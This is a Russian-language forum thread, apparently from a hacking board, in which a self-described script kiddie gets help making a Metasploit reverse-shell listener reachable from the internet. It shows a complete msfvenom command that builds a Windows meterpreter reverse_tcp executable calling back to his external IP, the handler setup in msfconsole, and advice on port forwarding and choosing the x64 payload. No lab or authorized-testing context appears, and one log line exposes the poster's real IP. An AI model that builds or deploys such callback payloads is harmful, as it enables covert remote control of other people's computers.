Просмотр полной версии : Проблема с Metasploit
Доброго времени суток. Возникла проблема с Metasploit'oм. Хотя, если задуматься, то виноват вовсе не он.
Дело в том, что порт 4444 (как, впрочем, и все остальные) закрыт и занят неким krb524. Простая попытка открыть порт через iptables, разумеется, не дала ничего. Я, начитавшись информации про ошибку в Метасплоите, которая возникала из-за невозможности подключиться к порту 4444 в гугле, стал сетовать на роутер. Добавил на нем правило, пробросив этот порт. Однако ничего не изменилось.
Сам процесс krb524 я пытался убить, и... теперь nmap этот процесс всё ещё видит, а pgrep - нет. Думаю попробовать банально удалить эту утиллиту, но мне интересно, сталкивался ли кто-либо с подобным? И как исправлял?
Ах да, подобная трабла наблюдается у меня минимум на трех устройствах: ПК, ноутбук и телефон (!) с установленным termux.
Vovo4ka said:
↑ (https://antichat.live/posts/4182305/)
Сам процесс krb524 я пытался убить, и... теперь nmap этот процесс всё ещё видит, а pgrep - нет
nmap его не видит, а просто сообщает какая служба обычно использует этот порт, не конкретно на твоей машине,а вообще
Vovo4ka said:
↑ (https://antichat.live/posts/4182305/)
Простая попытка открыть порт через iptables, разумеется, не дала ничего
порт открывает программа, которая собирается с ним работать, iptables лишь разрешает или запрещает обращаться к этому порту
Vovo4ka said:
↑ (https://antichat.live/posts/4182305/)
Дело в том, что порт 4444 (как, впрочем, и все остальные) закрыт и занят неким krb524
он не может быть закрыт и занят одновременно, если закрыт значит никто его не слушает, а если handler метасплоита всё же запущен, значит он слушает порт на другом интерфейсе
dmax0fw said:
↑ (https://antichat.live/posts/4182345/)
он не может быть закрыт и занят одновременно, если закрыт значит никто его не слушает, а если handler метасплоита всё же запущен, значит он слушает порт только на интерфейсе localhost
То есть handler может работать только с локальными адресами?
Vovo4ka said:
↑ (https://antichat.live/posts/4182352/)
То есть handler может работать только с локальными адресами?
нет
в твоём случае проблема скорее всего либо в фаерволе роутера или машины с метасплоитом либо сам метасплоит слушает какой-то другой интерфейс
dmax0fw said:
↑ (https://antichat.live/posts/4182357/)
нет
в твоём случае проблема скорее всего либо в фаерволе роутера или машины с метасплоитом либо сам метасплоит слушает какой-то другой интерфейс
Ну, роутер отпадает: я пробросил порт 4444. Машины разные, сомневаюсь, что на всех одна и та же проблема с файрволом возможна. Значит, дело в самом Метасплоите. Хорошо, спасибо, буду разбираться
То есть handler может работать только с локальными адресами?
Он может работать даже с 0.0.0.0
lsof -i | grep 4444
VY_CMa said:
↑ (https://antichat.live/posts/4182362/)
lsof -i | grep 4444
Code:
root@kali:~# lsof -i | grep 4444
root@kali:~#
Какой модуль используешь для запуска?
VY_CMa said:
↑ (https://antichat.live/posts/4182386/)
Какой модуль используешь для запуска?
multi/handler
Vovo4ka said:
↑ (https://antichat.live/posts/4182388/)
Пардон, если не так понял (ибо скрипткидди): multi/handler
pkill -9 ruby и после попробуй запускать.
Jerri said:
↑ (https://antichat.live/posts/4182523/)
pkill -9 ruby и после попробуй запускать.
Не дало решительным образом ничего.
.SpoilerTarget" type="button">Spoiler
Code:
root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=109.---.--.--- LPORT=4444 -f exe R > /root/programm.exe
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 333 bytes
Final size of exe file: 73802 bytes
root@kali:~# ls
Desktop Documents Downloads programm.exe Music Pictures Public Templates Videos
root@kali:~# pkill -9 ruby
root@kali:~# msfconsole
__________________________________________________ ____________________________
| |
| 3Kom SuperHack II Logon |
|_________________________________________________ _____________________________|
| |
| |
| |
| User Name: [ security ] |
| |
| Password: [ ] |
| |
| |
| |
| [ OK ] |
|_________________________________________________ _____________________________|
| |
| https://metasploit.com |
|_________________________________________________ _____________________________|
=[ metasploit v4.16.15-dev ]
+ -- --=[ 1699 exploits - 968 auxiliary - 299 post ]
+ -- --=[ 503 payloads - 40 encoders - 10 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
msf > use multi/handler/
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 109.---.--.---
LHOST => 109.---.--.---
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > exploit
Exploit running as background job 0.
[-] Handler failed to bind to 109.252.62.124:4444:- -
Started reverse TCP handler on 0.0.0.0:4444
msf exploit(handler) > exit
ну во первых в exploit/handler не нужно устанавливать в качестве LHOST свой внешний ip в случае если ты за роутером, ибо внешний ip это ip роутера а не машины с kali
но это в принципе всё равно, так как он предупреждает тебя о невозможности забиндить порт на этом ip и биндит его на любом доступном ipv4 интрефейсе
а во вторых закрой все метасплоиты, сделай на машине с кали nc -lvp 4444 , и попробуй подключиться на этот порт например с другой машины с линуксом:nc 4444
если порт проброшен верно и не мешают фаерволы, то в kali увидишь успешный коннект
а дальше уже плясать от этого
dmax0fw said:
↑ (https://antichat.live/posts/4182845/)
ну во первых в exploit/handler не нужно устанавливать в качестве LHOST свой внешний ip в случае если ты за роутером, ибо внешний ip это ip роутера а не машины с kali
А какой тогда? Или вы имеете в виду, что надо сидеть не через роутер?
dmax0fw said:
↑ (https://antichat.live/posts/4182845/)
а во вторых закрой все метасплоиты, сделай на машине с кали nc -lvp 4444 , и попробуй подключиться на этот порт например с другой машины с линуксом:nc 4444
если порт проброшен верно и не мешают фаерволы, то в kali увидишь успешный коннект
Что ж, похоже, порт проброшен неверно. Я запустил прослушку порта у себя на компьютере, и с телефона (через мобильный интернет, естессно) через Termux запустил netcat, который, немного подумав, радостно выдал Connection Timed Out.
Ладно, буду изучать в этом направлении подробней. Спасибо!
Vovo4ka said:
↑ (https://antichat.live/posts/4183063/)
А какой тогда?
локальный ip машины на которой запущен метасплоит
вижу ты не совсем понимаешь суть проброса портов
когда ты запускаешь метасплоит, он ничего не знает о внешнем ip, о нём знает только роутер так как внешний ip присваивается именно роутеру, а всем кто подключен к роутеру по wifi или по проводу присваивается локальный ip
метасплоит ждёт подключение на локальном ip, но как достучаться из внешки на этот локальный ip и порт? для этого и существует проброс портов
ты пробрасываешь порт с роутера на этот локальный ip, следовательно когда кто-то извне коннектится на ip роутера и порт 4444, то роутер перенаправляет трафик на локальный ip, а там его уже ловит метасплоит
dmax0fw said:
↑ (https://antichat.live/posts/4183076/)
локальный ip машины на которой запущен метасплоит
вижу ты не совсем понимаешь суть проброса портов
когда ты запускаешь метасплоит, он ничего не знает о внешнем ip, о нём знает только роутер так как внешний ip присваивается именно роутеру, а всем кто подключен к роутеру по wifi или по проводу присваивается локальный ip
метасплоит ждёт подключение на локальном ip, но как достучаться из внешки на этот локальный ip и порт? для этого и существует проброс портов
ты пробрасываешь порт с роутера на этот локальный ip, следовательно когда кто-то извне коннектится на ip роутера и порт 4444, то роутер перенаправляет трафик на локальный ip, а там его уже ловит метасплоит
Не, я понял уже) О том, что такое проброска портов, я уже знал) Просто голова последнее время совсем не работает) Спасибо
dmax0fw said:
↑ (https://antichat.live/posts/4183076/)
локальный ip машины на которой запущен метасплоит
вижу ты не совсем понимаешь суть проброса портов
когда ты запускаешь метасплоит, он ничего не знает о внешнем ip, о нём знает только роутер так как внешний ip присваивается именно роутеру, а всем кто подключен к роутеру по wifi или по проводу присваивается локальный ip
метасплоит ждёт подключение на локальном ip, но как достучаться из внешки на этот локальный ip и порт? для этого и существует проброс портов
ты пробрасываешь порт с роутера на этот локальный ip, следовательно когда кто-то извне коннектится на ip роутера и порт 4444, то роутер перенаправляет трафик на локальный ip, а там его уже ловит метасплоит
http://s1.radikale.ru/uploads/2018/2/12/b0b1b0918e6cfcaf8765321b37dd3194-full.png
Верно ли я настроил проброску?
Есть! Handler запустился и работает (вроде как)! Спасибо! Посмотрю, будет ли нормально работать.
Теперь возникает ещё одна проблема: несовместимость полученных в msfvenom файлов с Виндой 7. Не запускаются ни под какими предлогами. Возможности проверить на других машинах нет. С чем это может быть связано?
разрядность винды какая ?
Sensoft said:
↑ (https://antichat.live/posts/4184404/)
разрядность винды какая ?
Скорее всего х64. сейчас посмотреть и сказать точно не могу, уточню позже.
Vovo4ka said:
↑ (https://antichat.live/posts/4184405/)
Скорее всего х64. сейчас посмотреть и сказать точно не могу, уточню позже.
если не 64 тогда скорей в этом
Sensoft said:
↑ (https://antichat.live/posts/4184406/)
если не 64 тогда скорей в этом
То есть не-х64 версии Windows он не может брать?
Vovo4ka said:
↑ (https://antichat.live/posts/4185021/)
То есть не-х64 версии Windows он не может брать?
я не помню
вроде как, а может и нет, загугли глянь
у меня 8.1 64x всё збс работает
Vovo4ka said:
↑ (https://antichat.live/posts/4185021/)
То есть не-х64 версии Windows он не может брать?
-p /windows/meterpreter/reverse_tcp
-p /windows/x64/meterpreter/reverse_tcp
Jerri said:
↑ (https://antichat.live/posts/4185057/)
-p /windows/meterpreter/reverse_tcp
-p /windows/x64/meterpreter/reverse_tcp
Merci!
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot